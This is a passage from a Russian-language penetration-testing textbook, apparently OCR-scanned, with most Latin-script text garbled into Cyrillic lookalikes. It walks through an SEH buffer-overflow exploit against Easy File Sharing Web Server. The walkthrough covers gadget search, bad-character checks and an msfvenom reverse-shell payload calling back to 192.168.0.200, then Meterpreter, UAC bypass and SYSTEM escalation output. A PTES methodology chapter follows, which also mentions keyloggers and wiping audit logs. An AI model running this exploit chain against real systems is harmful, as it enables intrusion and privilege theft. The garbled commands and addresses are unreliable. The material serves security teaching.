ЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙ 


Рис. 15.13. Повторение ошибки 
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Рассмотрим ошибку глубже: 

1. ЕІР не переписан (не АААА или 41414141). 

2. На часть буфера указывают регистры I: ПХ и Н1) I (но не на начало). 

3. ЕАХ указывает на переписанный адрес (41414141). 

4. 5ЕН переписан, что и вызвало ошибку (больше о 5ЕН можно почитать здесь: 
Шр8://гсттсогеІап.Ье/іпсІех.ркр/2009/07/25/ш>гіІіп§-Ьи//ег-оѵег/Іо№-ехрЫ(:$-а- 
диіск-апсі-Ъстс - ІиіогіаІ-раН-3-$ек /). 



Необходимо найти ойзеі до 5ЕН оѵепѵгйе-а. Для этого мы используем утилиту 
Меіазріой Ргаше\ѵогк-а: раНегп_сгеа1:е.гЬ и раі1егп_ой'5е1.гЪ. 

В результате определяем, что 5ЕН переписывается, начиная с 4065-го символа: 

гоо1:@ка1і:~/еа5у-Рі1е5Ііагіп§іліеЬ7.2# /и5г/5Ріаге/те1:а5р1оі-(;--Ргатеі«/огк/-(;ооІ5/ехр1оі1:/ 
раІДегП-О-р-РзеІ:. гЬ -1 5000 -л 46356646 
[*] ЕхасГ таТсН аГ о-р-РзеТ 4065 

Изменяем наш эксплойт-код, чтобы подтвердить контроль над 5ЕН: 


РАУІ_ОАО="А" * 4065 + "ВВВВ" + "С" * 931; 
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В результате видим, что 5ЕН переписан корректно: 42424242 (ВВВВ). 

Для успешного выполнения кода нам необходимо найти РОР, РОР, КЕТ последо¬ 
вательность в загруженных модулях, для которых не включен ЗаІеЗЕН, а также 
проверить, используется ли АЗ ГК для модулей (рекомендуем изучить подробнее 
данные методы защиты). 

ЗаІеЗЕН можно проверить, используя плагин в ОПѵПЬд: 



Рис. 15.16. Использование плагина в ОІІуЭЬд 


А5ЕК можно проверить, сравнив адреса загружаемых модулей между перезапуска¬ 
ми аппликации и перезагрузкой ОС. 

В результате: 

а) Модули без включенного ЗаІеЗЕН: 


/ЗаРеЗЕН ОРР 
/ЗаРеЗЕН ОРГ 
/ЗаРеЗЕН ОРР 
/ЗаРеЗЕН ОРР 

0К6ІС00000 

0ХІѲѲ00000 

0х5сЮ00Ѳ 

0x400000 

0Х6ІС99000 

0ХІ005000Ѳ 

Й-: 66-7000 

Ѳх5с2000 

з!ё!ёТз*'“ 

0.9.8к 

7, 2, Ѳ. 0 

С:\ЕР5 ЗоР«иаге\Еаау Рііе ЗЬагіпд ЫеЬ Зегѵег\заІ ііеЗ.сІІ 1 
С:\ЕРЗ ЗоР«иаге\Еаеу Рііе ЗЬагіпд ШеЬ Зегѵег\ІпадеСоа(1.сИ 1 
С:\ЕР8 ЗоР<маге''Еаеу Рііе ЗЬагіпд МеЬ ЗегѵегЧЛВЕ0Ѵ32.<Л 1 
С:\ЕРЗ ЗоРімагехЕаау Рііе ЗЬагіпд ШеЬ ЗегѵегхРеиіе.ехе 

б) Проверка 

на АЗ Г К (перезагрузить \ѵіпс1о\ѵз): 

✓ЗаРеЗЕН ОРР 
✓ЗаРеЗЕН ОРР 
/■ЗаРеЗЕН ОРР 
✓ЗаРеЗЕН ОРР 

0x61 С0Ѳ00Ѳ 
0ХІ0008000 
0ХБСІ00Ѳ0 
0X400000 

0х61с990Ѳ8 

0ХІ0Ѳ500Ѳ0 

0х6е?0Ѳ0 

0х5с2000 

3.8.8.3 

0.9.8к 

7, 2, 0. Ѳ 

С:\ЕР5 ЗоРгыагехЕаеу Рііе ЗЬагіпд ЫеЬ Зегѵег\здІ ігеЗ.сІІ 1 

С:\ЕР5 ЗоР«ыаге\Еаау Рііе ЗЬагіпд МеЬ ЗегѵегМпадеГоагі. сП 1 
С:\ЕР5 ЗоР«ыаге\Еа5у Рііе ЗЬагіпд ЫеЬ 5егѵег\І_ІВЕЙѴ32.сІ 11 
С:\ЕРЗ 5оР*ыаге\Еаеу Рііе ЗЬагіпд ШеЬ Зегѵег\р5ме.ехе 


АЗ Г К не включен во всех исполняемых файлах и библиотеках сервиса. 

1. Теперь найдем неиспользуемые РОР, РОР, КЕТ комбинации (отличная цель 
здІііеЗ.сШ): в зрІііеЗ.сШ целей нет, зато их много в Іта§еЕоасЫ11 

/изг/зЬаге/теТазрІоіГ-'Ргатемогк/ѵепсІог/ЬипсіІе/гиЬу/г . З.Ѳ/Ьіп/тзГрезсап -р 
Іта§еІ_оасІ.сІ11 

0х10Ѳ21Ьса рор еЬх; рор есх; геТ 
0ХІ0021ТСІС рор еЬр; рор еЬх; геТ 
0х10021ГГе рор еЬр; рор еЬх; геТ 
0x10022108 рор еЬр; рор еЬх; геТ 
0х1002215Ь рор еЬр; рор еЬх; геі 
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0x10022369 

рор 

еві; 

рор 

еЬх; 

геѣ 

0x1002237с! 

рор 

Ѳ5І; 

рор 

еЬх; 

геТ 

0x10022391 

рор 

еві; 

рор 

еЬх; 

геѣ 

0x10022433 

рор 

еві; 

рор 

еЬх; 

геѣ 

0x10022512 

рор 

еві; 

рор 

еЬх; 

геі; 


а) Попробуем использовать адрес КМШЪса 
5ЕН перезаписан удачно: 



5Е Ьапсііег 


Э5206РОС 






Достигнута точка прерывания. 

Попадаем на 4 байта до переписанного нами 8 НН: 


ЛИЛИ 20ІДЛ *=і*=і 2Ні ЛИ -6125]2^І 5Щ 


ІаШаТдЫ-Ы 4і--—-- 

ІМС ЕСХ 


0Б2Ѳ6РЙО 

Ѳ52Ѳ6РЙЕ 

Ѳ5206РЙР 

0Б2Ѳ6РБ0 

052Ѳ6РВЗ 

05206РВ6 

41 

41 

41 

СЙ 1В02 

1043 43 

43 

ШС ЕСХ 

ШС ЕСХ 

ШС ЕСХ 

РЕТР 21В 

ЙйС ВѴТЕ РТР БЗ: СЕВХ+43], ЙІ_ 

ШС ЕВХ 

Раг ге^игп 


2. Теперь попробуем перепрыгнуть через 5ЕН, перезаписать, используя переход 
по условию, и записать туда наш шелл-код 

а) Проверим на наличие «плохих» символов (риі; 01-ЕЕ символы после 5ЕН 
перезаписи): 253 байт 

асісіесі \х20 - пробел - "плохой" символ 
асісіесі \х25 - % "плохой" символ 
асісіесі \х2Ь - + "плохой" символ 
асісіесі \х2Т 
асісіесі \х5с - \ 

Все «плохие» символы найдены. 

б) Попробуем \х76\х06\х77\х04 для перехода вперед 

в) Лучше перейти на 6 байт, а не на 4. В любом случае выходим из контроли¬ 
руемого пространства: 


У «| X) ►)!!) «4В 

Ч 1ІІЛІ ^ ±11 ьЩ мЩ\ѵ| н| с |/| к| в | 

05Ѳ86РЙВ 
05086РЙС 
05086РЙЕ 
05086Р Б Ѳ 
05086РВЗ 
05Ѳ86РВ9 
05086РВЙ 
Ѳ5Ѳ86РВВ 
05086РВС 
05086РВО 
05086РВЕ 
05086РСѲ 
05086РС7 
05086РС9 

41 

ѵ76 06 
ѵ77 04 

СЙ 1ВѲ2 

1090 90909090 

90 

90 

90 

90 

90 

0102 

030405 06070809 
0Й0В 

0С ѲР_ 

ШС ЕСХ 

ОВЕ 5Н0ВТ 05086РВ4 

М 5Н0ВТ 05086РВ4 

РЕТР 21В 

ЙВС ВѴТЕ РТР □3:СЕЙХ+90909090],ОІ- 

НОР 

МОР 

ИОР 

МОР 

ИОР 

Й00 0Ш0В0 РТР 03:СЕОХ],ЕЙХ 

Й00 ЕЙХ,0Ш0В0 РТР 05:СЕЙХ+9080706] 

ОР СИ, ВѴТЕ РТР 05:[ЕВХ] 

ОР ЙИ.0Р _ 

Раг гебигп 
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3. Добавим шелл-код и получим доступ к консоли на целевой системе 

а) Сгенерируем шелл-код, используя тзГѵспот и без «плохих» символов: 

тзГѵепош -р міпсІоіл/5/5Ііе11/пеѵеп5е_І:ср 1Ьоз'1:=192.168.0.200 -Ь "\х00\хГГ\х20\х25\ 
х2Ь\х2-р\х5с" 1рог1:=444 -Г руТНоп -ѵ зііеіісосіе 

б) Добавляем шелл-код и пробуем. Успех! 

[*] 51ап1:ес1 пеѵегзе ТСР НапсІІег оп 192.168.0.200:444 
[*] 51ап1:іп§ ІНе рауіоасі Напсііег... 

[*] Епсосіесі зіа^е міІН х86/зІііка1:а_§а_паі 

[*] 5епсііп§ епсосіесі 5І:а§е (267 Ьуіез) Іо 192.168.0.110 

[*] СоттапсІ зііеіі зеззіоп 1 орепесі (192.168.0.200:444 -> 192.168.0.110:49222) аі 
2016-11-27 14:51:39 +0200 

МІСПОЗОП ИІПСІ0М5 [ѴѲГ5ІОП 6.1.7601] 

Соругі§Іі1: (с) 2009 Місго5оГ1 Согрогаііоп. АН гі@Ш5 гезегѵесі. 

С: \ІІ5ег5\1:е5І:\0е5к-1:ор>ірсоп-рі§ 

в) Сделаем то же самое, используя теіегргеіег для повышения привилегий 
в системе: 

шзГ ехрІоі-ЦНапсІІег) > зет рауіоасі иіпсІои5/те1:епрге1:еп/геѵеп5е_1:ср 
рауіоасі => міпсіом5/те1:егрге1:ег/геѵег5е_1:ср 
тзГ ехрІоі-ЦНапсІІег) > ехріоіі: 

[*] БІагТесІ геѵегзе ТСР НапсІІег оп 192.168.0.200:444 
[*] 51:аг1:іп§ ЦГіе рауіоасі кіапсііег... 

[*] 5епс1іп@ Ла^е (957999 Ьуіез) Іо 192.168.0.110 

[*] МеТепргеТеп 5Ѳ55ІОП 2 орепесі (192.168.0.200:444 -> 192.168.0.110:49178) аТ 
2016-11-27 14:55:17 +0200 

теСегргеСег > §е1:иісі 

Зегѵег изегпате: СезС-РСХТегТ 

теТегргеТег > 

теГегргеГег > 

теГегргеГег > Ьаск§поипсІ 

[*] Васк§поипсііп§ зеззіоп 2... 

тзГ ехр1оі1:(ИапсІ1ег) > 

тзГ ехр1оі1:(ИапсІ1ег) > 

тзГ ехр1оі1:(ИапсІ1ег) > изе ехрІоіТ/міпсІоиз/ІосаІ/Ьураззиас 

тзГ ехр1оі1:(Ьура55иас) > 5еѣ зеззіоп 2 
5Ѳ55ІОП => 2 

тзГ ехр1оі1:(Ьура55иас) > ехріоіі 

[*] 51ап1:ес1 геѵегзе ТСР Иапсііег оп 192.168.0.200:4444 
[*] ІІАС І5 ЕпаЫесі, сІіескіп§ іеѵеі... 

[+] ІІАС І5 зет Іо ОеГаиІТ 

[+] ВураззІІАС сап Ьуразз ТНІ5 зе1:1:іп§, сопТіпиіп§.. . 

[+] Рагі: оГ Асітіпізііпаііопз §поир! Соп1:іпи1п§. . . 

[*] Ііріоасіесі ТНе а§еп! Іо ІИе Гііезузіет.... 

[*] ІІр1оасІіп§ ІИе Ьуразз ІІАС ехесиТаЫе Іо ТІіе Гііезузіет... 

[*] МеТепргеТеп 5Іа@еп ехесиІаЫе 73802 Ьуіез 1оп§ Ьеіп§ иріоасіесі.. 
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[*] 5епсііп@ 5Та§е (957999 ЬуТез) То 192.168.0.110 

[*] МеТегргеТег зеззіоп 3 орепесі (192.168.0.200:4444 -> 192.168.0.110:49181) аТ 
2016-11-27 14:55:58 +0200 

теГегргеТег > §еТиіс1 
Бегѵег изегпате: ГегТ-РСХТезТ 
теГегргеТег > §еТ5у5І:ет 

. ..§01: зузТет ѵіа ТесНпщие 1 (МатесІ Ріре ІтрегзопаТіоп (Іп Метогу/Асітіп)). 
теГегргеТег > 
теГегргеТег > 
теГегргеТег > §еТиісі 

5егѵег изетате: ИТ АІЛН0КІТѴ\5Ѵ5ТЕМ 


Резюме 

Переполнение буфера является одной из самых распространенных и в то же время 
критических уязвимостей. 

Несмотря на то что многие специалисты наслышаны о переполнении буфера, 
а также о том, что эта тема остается очень популярной и освещенной, тем не менее 
в ней не так-то просто и разобраться. Множество примеров и описаний, которые 
можно найти в глобальной сети, для понимания требуют хороших навыков про¬ 
граммирования на С, понимания АззатЫег и опыта использования отладчиков. 
С другой стороны, некоторые статьи описывают методику переполнения буфера, 
фокусируясь лишь на теоретическом, абстрактном уровне. 

Буфер обычно переполняется при отсутствии проверки длины (размера) ввода 
в соответствии с выделенным участком памяти под данные. Например, при вводе 
500 символов в поле, для которого зарезервировано всего 50 байт памяти. В резуль¬ 
тате будут переписаны «соседние» 450 байт, что может кардинально изменить ход 
выполнения программы и привести к выполнению произвольного кода. 

Для нахождения уязвимостей переполнения буфера обычно используются Еиггег’ы, 
при помощи которых программе отправляются данные различной длины и содер¬ 
жания в надежде вызвать сбой программы. 

При нахождении уязвимости производится анализ состояния памяти в момент про¬ 
граммной ошибки, чтобы оценить возможность эксплуатации данной уязвимости. 

Существуют методы защиты от переполнения буфера на уровне компиляции или 
ОС. Основные: Сапагіез, ЗаіеЗЕН, А5БК, О ЕР. При помощи данных методов экс¬ 
плуатация уязвимостей переполнения буфера становится существенно сложнее 
или даже невозможной. Хотя полностью и не исключает эксплуатацию. 

Практически для каждого метода защиты есть методы, позволяющие все же про- 
эксплуатировать уязвимость. Например, А5БК часто можно обойти, переписав 
только часть адреса, которая не изменяется, а в случае с БЕР прибегают к КОР 
(КеПіпі Огіепі ссі Рго§гаттіп§), используя исполняемый код из уже загруженных 
модулей для выполнения необходимых действий. 
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Существует множество способов проведения тестов на проникновение, и у каждо¬ 
го из них есть свои достоинства и недостатки. Теперь, когда вы знакомы со всеми 
основными этапами тестов на проникновение, постараемся рассмотреть весь про¬ 
цесс целиком. 

Сам процесс тестирования достаточно энергозатратен, требует тщательного плани¬ 
рования, определения самой цели и конкретных шагов для ее достижения. После 
завершения планирования, получения необходимых разрешений и информиро¬ 
вания задействованных лиц начинается сам тест. Обычно его начинают со сбора 
информации, которая впоследствии пригодится для сканирования сети и других 
активных действий. После того как цель тестирования была достигнута, подготав¬ 
ливается отчет, в котором отражаются все действия, найденные уязвимости, методы 
их эксплуатирования и рекомендации по устранению таковых. 

Перейдем к более конкретному рассмотрению этапов. Прежде всего, важно осо¬ 
знать, что тесты на проникновение являются частью нормального жизненного 
цикла любой ИТ-инфраструктуры. Необходимость в их проведении может быть 
обусловлена как внутренней политикой, так и требованиями третьей стороны. 
В любом случае такие мероприятия позволяют по-настоящему оценить возможные 
риски и выявить скрытые проблемы. 

Обычно во время таких тестов оцениваются следующие компоненты ИТ- 
инфраструктуры: приложения, сетевые сервисы, сетевые устройства, среды пере¬ 
дачи данных, подготовленность сотрудников и физическая безопасность. 

Тесты на проникновение можно классифицировать исходя из такого параметра, 
как осведомленность атакующего. 

Черный ящик — лучше всего характеризует большую часть атак на сеть. В дан¬ 
ном случае чаще всего атака происходит удаленно, а атакующему изначально 
известно только название организации. Используя приемы, в том числе и опи¬ 
санные в этой книге, специалист получает более подробную информацию о цели 
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и использует ее для дальнейших действий. Во время своих действий атакующий 
документирует все найденные уязвимости и их потенциальную опасность, для 
того чтобы в последующем использовать их для атаки и предоставления отчета 
заказчику 

Серый ящик — в этом случае атакующий изначально обладает некоторым количе¬ 
ством информации. Например, ему могут быть известны версии программного обе¬ 
спечения или структура сети. Это делается для того, чтобы сократить необходимое 
для атаки время, ведь у нас сразу же будет возможность узнать о самых критичных 
точках в сетевой инфраструктуре. В остальном же данный процесс будет похож на 
предыдущий. 

Белый ящик — такое тестирование производится при наличии у атакующего 
полной информации о своей цели. Данный вид тестирования позволяет наиболее 
полно оценить ИТ-инфраструктуру и гарантированно обнаружить большую часть 
проблемных мест. Зачастую такой способ тестирования используется при прове¬ 
дении внутренних аудитов. 

При официальном, разрешенном аудите информационных систем существует не¬ 
сколько вариантов проведения тестирования: 

□ Слепое тестирование — не подразумевает наличия у атакующего какой-либо 
важной информации о цели, однако сотрудники, имеющие отношение к тести¬ 
руемой инфраструктуре, заранее предупреждаются о нападении. 

□ Двойное слепое тестирование — аудитор также не располагает никакими дан¬ 
ными о цели, но о предстоящей атаке знает лишь несколько человек из целевой 
организации. Большая часть тестов проходит именно по этому сценарию. 

□ Реверсное тестирование — аудитор имеет всю информацию о системе, а со¬ 
трудники знают о будущем тесте, но не располагают данными о том, где и когда 
он будет происходить. 


Стандарт выполнения тестов 
на проникновение 

Существует несколько популярных стандартов, по которым обычно выполняются 
тесты на проникновение. Хотя на практике они и не обязательны к исполнению, 
однако, используя их, можно сделать свои действия более методичными, избежать 
типичных ошибок и не упустить из виду важные детали. 

Одним из таких стандартов является РЕТ5, разработанный несколькими экспер¬ 
тами по информационной безопасности с целью конкретизации методов и шагов, 
которые должны предпринимать специалисты по ИВ во время тестирования. Дан¬ 
ный стандарт доступен для ознакомления полностью и бесплатно на официальном 
сайте кЫр://тіпѵ!)шірепіе$і-$іапсІаг(1.ог&. 
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В РЕТ5 выделяются семь фаз тестирования: 

□ подготовительная фаза; 

□ сбор данных; 

□ моделирование угроз; 

□ анализ уязвимостей; 

□ эксплуатация уязвимостей; 

□ постэксплуатационная фаза; 

□ отчет. 

Эти семь фаз отражают все действия, которые должны происходить во время те¬ 
ста на проникновение. РЕТ5 — достаточно новый стандарт, однако он постоянно 
поддерживается, обновляется и изменяется вместе с требованиями к аудитам ИБ. 

Прежде чем мы рассмотрим каждую из фаз, стоит сказать о том, что хотя этот 
стандарт и пытается охватить весь процесс теста на проникновение, однако, как вы 
заметите, ни один аудит не проходит по стандартной схеме, каждый из них будет 
чем-то отличаться от других. 

Подготовительная фаза 

Часто встречаются утверждения о том, что планирование — это залог успеха. И это 
действительно так, особенно когда речь идет об аудите безопасности. Действитель¬ 
но, для того чтобы удачно провести аудит, необходимо серьезно подготовиться, 
учесть все нюансы, подобрать нужные инструменты и методологию. 

Обычно тест на проникновение начинается со встречи заинтересованных сторон, 
на которой обсуждаются все необходимые детали, определяются цели и методы, 
а также люди, которые могут быть вовлечены в дальнейшем. К завершению такой 
встречи у вас должно сформироваться определенное видение целей и задач пред¬ 
стоящей работы, без этого в конце теста будет практически невозможно определить, 
выполнили ли вы поставленную задачу. Прежде всего, необходимо определить 
основные цели атаки, выяснить, что будет подвергаться нападению, а что нет, 
определить объем и основной тип тестов. 

Вот примерный список вопросов, которые должны обсуждаться на таких встречах: 

□ Основные виды деятельности целевой организации? 

□ Есть ли какие-либо ограничения, касающиеся определенных видов тестов? 

□ Какие данные и системы будут подвергаться тестированию? 

□ Какие результаты должны быть в конце тестирования? 

□ Какова будет дальнейшая судьба результатов теста? 
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□ Каким бюджетом вы располагаете для проведения теста? 

□ Какова окончательная цена теста? 

□ Какие ресурсы у вас имеются для тестирования? 

□ Какие действия разрешены для проведения теста? 

□ Кто будет проинформирован о проведении теста? 

□ Какая информация будет получена о целевой системе перед началом тестиро¬ 
вания? 

□ Какой результат можно считать удачным во время проведения теста? 

□ С кем можно контактировать в случае возникновения непредвиденной ситуа¬ 
ции? 

Необходимо убедиться в том, что все участники встречи прекрасно понимают воз¬ 
можные риски проведения определенных тестов, а также их специфику. Убедитесь, 
что ваши планируемые действия одобрены и согласованы со всеми участниками. 
Ниже приведены типичные варианты атак, которые могут проводиться как изо¬ 
лированно, так и в комплексе. 

Социальная инженерия. Самым слабым элементом любой системы являет¬ 
ся человек. Технологии могут помочь контролировать его действия, но не способ¬ 
ны полностью исключить этот фактор. Проведение тестов на проникновение при 
помощи социальной инженерии должно быть включено практически в каждый 
тест. 

Тестирование приложений. Может проводиться отдельно или быть частью общего 
теста на проникновение. Особый интерес представляют приложения, написанные 
индивидуально для конкретной организации, и приложения, работающие в не¬ 
стандартном окружении. 

Тестирование физической безопасности. Такие тесты особенно актуальны для 
правительственных и военных организаций. Во время проведения этих тестов не¬ 
обходимо попытаться получить доступ ко всем сетевым устройствам, находящимся 
как в главном здании, так и на удаленных локациях. 

Инсайдерские атаки. Попытка выдать себя за персону, у которой есть доступ к ка¬ 
кому-либо сетевому оборудованию. 

Внешние атаки. Попытка взлома сети человеком, находящимся за ее пределами. 

Атаки при помощи украденного оборудования. В этом случае атакующий после 
кражи какого-либо оборудования использует его для дальнейшего нападения. 

Следует также определить время и длительность проведения теста. Это очень важ¬ 
но, так как некоторые бизнес-процессы происходят только в определенное время 
суток. Необходимо соблюсти баланс, ведь тесты с использованием социальной 
инженерии очень трудно проводить в выходные дни или в нерабочее время. Обя- 
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зательно обсудите возможные риски и влияние на бизнес-процессы — это поможет 
вам обезопасить себя в случае непредвиденных ситуаций. 

Договор о проведении работ 

В случае тестирования сторонней организации всегда необходимо письменно 
закреплять достигнутые договоренности. В договоре необходимо отразить следу¬ 
ющие пункты: 

□ Системы, которые подвернутся тестированию. 

□ Возможные риски на случай наступления непредвиденных ситуаций, а они, как 
показывает практика, бывают довольно часто. 

□ Временные рамки с указанием дат и часов. Всегда планируйте время с запасом, 
помните про непредвиденные ситуации. 

□ Данные, которые вы получите перед началом тестирования. 

□ Действия, которые вы совершите при обнаружении уязвимости. Не всегда най¬ 
денную уязвимость можно поэксплуатировать, но это вы поймете только после 
попытки провести атаку. Однако не всегда это стоит делать, ведь в некоторых 
случаях это может привести к выходу из строя критических для заказчика си¬ 
стем. Помните о рисках. 

□ Результаты тестирования — то, в каком виде их получит заказчик и что они 
должны в себе содержать. 

Получение разрешения 

Это один из ключевых моментов тестирования сторонней организации. Необходи¬ 
мо получить документальное подтверждение тому, что ответственный человек со 
стороны организации, имеющий право подписи, утвердил ваш план и дал согласие 
на проведение таких работ. 

Нельзя начинать тесты, получив лишь устное согласие сторон. Без соблюдения 
такой формальности вы из категории законопослушного специалиста по инфор¬ 
мационной безопасности автоматически перейдете в разряд киберпреступников. 
В случае, если вы проводите тесты в той же организации, где и работаете, подтверж¬ 
дение не обязательно должно быть оформлено на бумаге, оно может быть и в виде 
письма, присланного по электронной почте. 

Не стоит пренебрегать бумажным документом, так как в случае возникновения 
каких-либо проблем он будет служить неоспоримым доказательством вашей не¬ 
виновности. Также в случае возникновения ситуаций, в которых будет необходимо 
провести ряд дополнительных, ранее не запланированных работ, необходимо под¬ 
писать дополнительное соглашение и получить разрешение. 
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Сбор данных 

После подписания всех необходимых бумаг можно двигаться дальше и начинать 
собирать необходимые данные. Этот этап уже относится к тесту на проникновение, 
даже если вы не взаимодействуете с целью напрямую. 

Существует огромное количество источников данных, и только вам решать, какие 
из них будут полезны для достижения конечной цели, а какие — нет. Выбирайте те, 
которые помогут вам в будущем получить наиболее полное представление о цели, 
а также определить приоритетность и направление векторов взлома. Источником 
информации может служить что угодно — поисковые системы, веб-сайты, вакансии, 
финансовые отчеты и, конечно же, социальные сети. 

В РЕТ5 выделяют три уровня данного этапа: 

□ Первый уровень — самый простой, можно использовать автоматические систе¬ 
мы сбора информации, а также самые популярные интернет-ресурсы. 

□ Второй уровень отличается от первого тем, что больше времени тратится на руч¬ 
ной сбор данных. На данном этапе необходимо более детально анализировать 
информацию для того, чтобы лучше узнать свою цель. 

□ Третий уровень — самый затратный по количеству времени и сил, на данном 
этапе атакующий находит самые уязвимые места системы. 

Прежде чем приступить к сбору данных, необходимо провести подготовительную 
работу, которая может включать в себя следующие шаги: 

□ Определитесь с целью. Хорошо, если перед вами поставлена конкретная задача, 
однако чаще всего информация о цели несколько размыта, и в этом случае не¬ 
обходимо определить, что конкретно вы должны искать. 

□ В случае, если вы проводите поиск цели для сторонней организации, необхо¬ 
димо определить рамки, за которые вы не можете выходить на данном этапе. 

□ Подумайте, сколько времени займет выполнение работ на данном этапе. 

□ Четко обозначьте цель. Вы должны понимать, какой информацией вы хотели 
бы обладать по окончании работ на данном этапе. 

В идеале в завершение работы вы должны иметь структурированную информацию 
из следующих источников: 

□ Публичная информация — все то, что доступно широкому кругу пользователей, 
в основном из официальных источников. 

□ Информация из открытых источников — любая информация, доступная широ¬ 
кому кругу пользователей из любых доступных источников. 

□ Специфичная информация — касается особенностей сферы работы предпри¬ 
ятия, например специфичного оборудования и программного обеспечения. 
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□ Сетевая информация — все, что можно узнать о сетевых сервисах: ІР-адреса, 
ІЖ$-заинси, сети и т. п. 

□ Уязвимости — потенциальные бреши в системе безопасности, которые могут 
быть поэксплуатированы на последующих этапах. 

□ Социальная инженерия — все то, что вы смогли выведать у сотрудников данной 
организации. 


Анализ уязвимостей 

На этом этапе вы, используя всю имеющуюся информацию и определившись 
с методами и инструментами, начнете непосредственное взаимодействие со своей 
целью. Вы должны определить и классифицировать любые возможные уязвимости, 
будь то некорректная конфигурация сервиса или ошибки, появившиеся по вине 
разработчиков конкретной программы. 

Проводя такой анализ, вы должны четко представлять себе, какие тесты будете 
проводить, какой инструментарий использовать и что именно хотите найти. Без 
выполнения данного условия вы можете потратить большое количество времени, 
все больше углубляясь в анализ какого-либо компонента сети. Однако без четкого 
осознания цели это может оказаться контрпродуктивным. 

Во время этого этапа вы, прежде всего, будете выполнять такие действия, как ска¬ 
нирование портов, получение информации об установленных программах, скани¬ 
рование на наличие уязвимостей и другие описанные ранее шаги. 

Как бы это ни было привлекательно, старайтесь избегать преждевременных попы¬ 
ток эксплуатации найденных уязвимостей. Помните, что вы еще только собираете 
полезную информацию. 

Моделирование 

Основная задача на этом этапе — построение тестовой среды, в которой вы сможете 
опробовать все планируемые варианты атаки на целевую систему. Апробация ме¬ 
тодов в виртуальной среде поможет вам избежать ошибок при работе с реальной 
целью, а также привлечь к себе меньше внимания, ведь при работе с настоящей 
целью вы будете использовать лишь проверенные методы. 

В процессе моделирования выделяют четыре основных этапа: 

□ изучение необходимой документации; 

□ определение первичных и вторичных методов атак; 

□ нахождение основных и второстепенных уязвимостей; 

□ определение методов атак для каждой из найденных уязвимостей. 
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По сути, этот процесс можно отнести к этапу сбора информации, но только более 
углубленному В идеале вы должны графически отобразить всю полученную на 
предыдущем шаге информацию — бизнес-процессы, физическое расположение, 
карту сети, иерархию сотрудников и т. д. К счастью, для этого существует множе¬ 
ство инструментов, о которых мы уже упоминали ранее. 


Эксплуатация уязвимостей 

После того как вы собрали всю необходимую информацию, определились с уязви¬ 
мостями, подготовили необходимые инструменты и выбрали нужные цели, можно 
приступать к следующему шагу. 

На данном этапе вы будете использовать найденные уязвимости для компроме¬ 
тации целевой системы и получения доступа к ней. Вы должны использовать по¬ 
лученную информацию для определения подходящей цели. Помните, что, найдя 
множество уязвимых систем, необходимо выбрать среди них ту, взлом которой 
предоставит в дальнейшем наибольшие преимущества. Найдя, например, множе¬ 
ство уязвимых рабочих станций и несколько серверов, лучше сосредоточить свое 
внимание на последних, так как их взлом поможет развивать дальнейшую атаку 
более эффективно. 

После определения цели вы должны использовать все свои практические навыки 
и знания для того, чтобы скомпрометировать ее. Вполне возможно, что с первого 
раза у вас ничего не выйдет и вам придется перепробовать множество методов, 
прежде чем вы достигнете желаемого результата. 

На данном этапе самыми популярными атаками являются: 

□ взлом пароля; 

□ перехват данных; 

□ перехват сессии; 

□ переполнение буфера. 

Все эти атаки, и не только их, мы уже рассматривали ранее, но помните, что они 
могут быть многокомпонентными и включать в себя как технический, так и чело¬ 
веческий фактор. 


Постэксплуатационный этап 

После того как ваша атака завершилась успехом, необходимо закрепиться в систе¬ 
ме. Это нужно для того, чтобы эксплуатация атакованной цели была более удобной. 
Вам не придется каждый раз заново взламывать систему, чтобы выполнить нужные 
действия, тем более что удачная эксплуатация одной и той же уязвимости может 
стать невозможной буквально сразу после взлома. 
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Для начала вам необходимо определить уровень своих прав в системе и набор до¬ 
ступных действий. Вполне возможно, что выполнение некоторых операций будет 
недоступно, тогда стоит задуматься о возможностях повышения своих привилегий. 

Что же можно сделать на данном этапе? Вы можете запустить клавиатурного 
шпиона, который вышлет вам пароль администратора после того, как тот зайдет 
в систему. Можете скопировать информацию о паролях для последующего анализа 
или установить ПО, которое обеспечит вам дальнейший доступ к системе и воз¬ 
можность ее удаленного контроля. Также можно ликвидировать следы вашего 
пребывания в системе, обычно это достигается путем удаления нужных записей 
из журналов аудитации. 

Отчет 

После того как все описанные выше этапы пройдены, необходимо создать отчет. 
Отчеты могут иметь различный вид, поэтому то, каким он будет в каждом конкрет¬ 
ном случае, необходимо обсудить перед началом теста, об этом мы уже упоминали. 

Все же, несмотря на разнообразие возможных форм отчетов, существуют опреде¬ 
ленные пункты, которые необходимо в него включить. Каждый отчет должен на¬ 
чинаться с краткого обзора процесса тестирования. Нет необходимости описывать 
здесь технические детали каждого шага, обзор должен отражать ключевые моменты 
теста. Далее необходимо привести список найденных уязвимостей и их анализ, при 
этом лучше всего сгруппировать их по степени важности — например, критические, 
важные, незначительные. 

Отчет должен включать в себя следующую информацию: 

□ сценарии и описание всех успешных атак; 

□ детальную информацию о полученных в ходе теста данных; 

□ детальную информацию обо всех найденных уязвимостях; 

□ описание всех найденных уязвимостей; 

□ предложения и технические решения для устранения найденных уязвимостей. 

В ходе проведения теста для последующего создания хорошего отчета необходимо 
записывать все свои действия в любой удобной для вас форме. 

Зачистка 

После удачного завершения теста необходимо по возможности удалить все следы 
ваших действий. В данном случае мы имеем в виду установленные программы, 
созданных пользователей, изменения конфигурации и все остальное, что вы успели 
сделать в ходе теста. Любые оставленные вами лазейки могут быть использованы 
кем угодно для получения несанкционированного доступа к уже скомпрометиро¬ 
ванной вами системе. 



Часть II 
ЗАЩИТА 


Введение 


Итак, если вы дочитали до начала второй части книги, это значит, что вы плавно 
подходите к ее завершению и уже ознакомились с основными шагами проведения 
аудита информационных систем и базовыми методами проникновения. 

Однако информационная безопасность, как и многое в нашем мире, представляет 
собой медаль с двумя сторонами. С одной стороны, мы проводим аудит, ищем 
способы проникновения и даже применяем их на практике. Это очень важно, ведь 
тем самым вы подтверждаете, что уязвимость действительно существует. Вторая 
же сторона медали — это защита систем. Зачастую бывает так, что даже в крупных 
организациях за безопасность отвечают два-три человека. Они же занимаются как 
аудитом, так и защитой собственной сети. И было бы логичным посвятить послед¬ 
ние главы книги именно этой важной и неотъемлемой части работы специалиста 
по ИБ. 

На самом деле на тему защиты написано множество книг и статей, и именно за¬ 
щитой занимается основная часть компаний, работающих в сфере ИБ. Но ни 
один даже самый прекрасный программный продукт не сможет защитить сеть от 
проникновения, если он находится в неумелых руках. Справедливо и обратное 
утверждение: профессионал, используя минимальное количество доступного ПО, 
